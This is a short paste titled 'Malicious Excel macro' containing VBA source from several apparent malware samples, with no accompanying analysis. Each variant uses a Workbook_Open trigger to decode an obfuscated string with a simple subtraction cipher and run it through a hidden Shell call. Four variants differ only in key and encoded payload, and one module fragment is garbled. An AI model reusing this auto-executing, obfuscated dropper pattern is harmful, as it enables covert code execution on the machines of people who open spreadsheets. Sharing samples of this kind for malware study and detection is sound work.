Malicious Excel macro

1. REM ===== Main Module (all versions) =================================================================================================
2.  
3. Attribute VB_Name = "Ёта нига"
4. Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
5. Attribute VB_GlobalNameSpace = False
6. Attribute VB_Creatable = False
7. Attribute VB_PredeclaredId = True
8. Attribute VB_Exposed = True
9. Attribute VB_TemplateDerived = False
10. Attribute VB_Customizable = True
11. Sub Workbook_Open()
12.     tyrtyaag
13. End Sub
14. y(i Mod UBound(bKey))
15. End If
16. Next i
17.  lqjWjFO = StrConv(bData, vbUnicode)
18. End Function
19.  
20. REM ===== Module 2 (all versions) ===================================================================================================
21.  
22. Attribute VB_Name = "Module2"
23. Public Function lqjWjFO(ByVal strData As String, ByVal strKey As String)
24.  
25. Dim bData() As Byte
26. Dim bKey() As Byte
27. bData = StrConv(strData, vbFromUnicode)
28. bKey = StrConv(strKey, vbFromUnicode)
29. For i = 0 To UBound(bData)
30. If i <= UBound(bKey) Then
31. bData(i) = bData(i) - bKey(i)
32. Else
33. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
34. End If
35. Next i
36.  lqjWjFO = StrConv(bData, vbUnicode)
37. End Function
38.  
39. REM ===== Module 1 (70C17F4AED600AC8121B8301D84C632C) =============================================================================
40.  
41. Attribute VB_Name = "Module1"
42. Private Const yY1UL = "cWolIdDu"
43. Private Const DDuKQ = "ÆÄÓŒx¯dÅÆæÑ»·¬ÈÃÛš®Ü©ƒ½ÑÀ‘“ÅÁÔϽ„—ÜÊãѶ’’È˝îƇÏÀÔÚ½r§ÆæڵӥǝØØ®ŒkËËã܃“sš{r”Œ¢š{›sÖ»ÔۮʩÉʞЯ׷΅ÒÍ«‹pŠ|ñ–´i¿¡¸»²Ó¨É¿ØÛ’¬rƸѓrŸdÈÏßÍ·Èdˆ«´¹™‰ ­ ¾Õ¸ÈªËÀÞµ‘’§Ä¹‘©‘³|˶’³­Ò»ÕԲӍ«…Ô䮟dÖËÐÞ½„i·œ¼¼nÀŽ¬¦ØۭʬÌƸ´wɼȒ"
44.  
45. Sub tyrtyaag()
46. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
47. Shell oPOJidsf, vbHide
48. End Sub
49.  
50. REM ===== Module 1 (F584A24F2423784935912FEC4C69CAC3) =============================================================================
51.  
52. Attribute VB_Name = "Module1"
53. Private Const yY1UL = "NmaYSkhE"
54. Private Const DDuKQ = "±ÚÅy‚¶ˆ•ÜؾžгÙ͇¸ãÍn•¯¾Ê˜·°×ƼNj»ÇàÕ¾À™¶³á°¸Í«ºÖÆÇÇ”–’ÜØÇ¿Úɲ³ÊŸ“¶áÕɍš—‡Ÿ†™ †›™‚Þ̳ÜÆ¿¸ÑÛ}ÑÇÌÆÖ–±ÎÀ’¢²®©xDz—¼ÊÈ·Ñзܪ¡ÎÉ°”Š”sÐà¾ÎϽs¼“º±~¯µ±Öн¹Óѽ¶©‡¶ÌÊn’µž »ª·ª¨¼ÚÌ´ÕÊÈœ³–³åÆ”sÞܯßÕyx¿­›½†µ´··ÜÅ¿»Ô×—µ¾ËУ"
55.  
56. Sub tyrtyaag()
57. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
58. Shell oPOJidsf, vbHide
59. End Sub
60.  
61. REM ===== Module 1 (20ABED801D3E69237741BE1478807AE9) =============================================================================
62.  
63. Attribute VB_Name = "Module1"
64. Private Const yY1UL = "QvDWeTuu"
65. Private Const DDuKQ = "´ã¨w”Ÿ•Å廼קݶⰅÊÌÚqž’¼ÜÄ³à©ºÙtÈÊ鸼҂öêr®Ê¶¸½ß©ÅÙ}£•å»ÅÑÃÖµ¼­ÃÊ|œ¹ê¸ÇŸƒ¤‡¨rŽ›‚©„¤u™ƒèµÛ³¼Ë¹ÛÄ¥¨½ØÇàÙ¥¹Œ€œvʉ¤µyÑ›¿“ÀԸ۹߳ ­‚زØk€ tÚÉæ¥ÅÉtš¥»‘§Š°¿šÅ­Æɺݺ卟“·Ö³–i«ª¡ÅvÒŽ ´½äµÜ¬Àԝ½Û¼¼ tèÅ׶˅yɖÔ|Áž¾ ß³»Ë¼ÞÀ¿Œ…ÊÌÚŒ"
66. Sub tyrtyaag()
67. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
68. Shell oPOJidsf, vbHide
69. End Sub
70.  
71. REM ===== Module 1 (725E148FE02413180043BEB27658F1C9) =============================================================================
72.  
73. Attribute VB_Name = "Module1"
74. Private Const yY1UL = "JsrfRsPb"
75. Private Const DDuKQ = "­àÖ†¾p²âéËÄƸ¯ßÞ”·ëµj›ÀËÉ Ÿ¬Ý×ÉÆ“£ÃææË¿¡ž¯ç ½·Õ“¶Ü×ÔÆœ~ŽâéԾⱮ¹ÛÒ·›w²çæÖŒ¢~© š€¥ƒ|¡¤–ˆ¢Ã®Øá˸ض½¢ÖÌÅæ»xÖÓÈyŸwoÇ·³¢˜¬”¼ÁÏÁ׶²Üᯚ¡³«Õ™“µÂãÓÔ¶“už¸¿¶wÏš“ÂÛÕ¶Ù¸³â»®€Ö±¬“—º—À oϼ¯¡Ü¿®ÙÚÏÁ¼˜xØêˍ“þÔäÚr˜¤À‹®½™™Üáʸ۹¹¼º”·ëµ…"
76.  
77. Sub tyrtyaag()
78. oPOJidsf = lqjWjFO(DDuKQ, yY1UL)
79. Shell oPOJidsf, vbHide
80. End Sub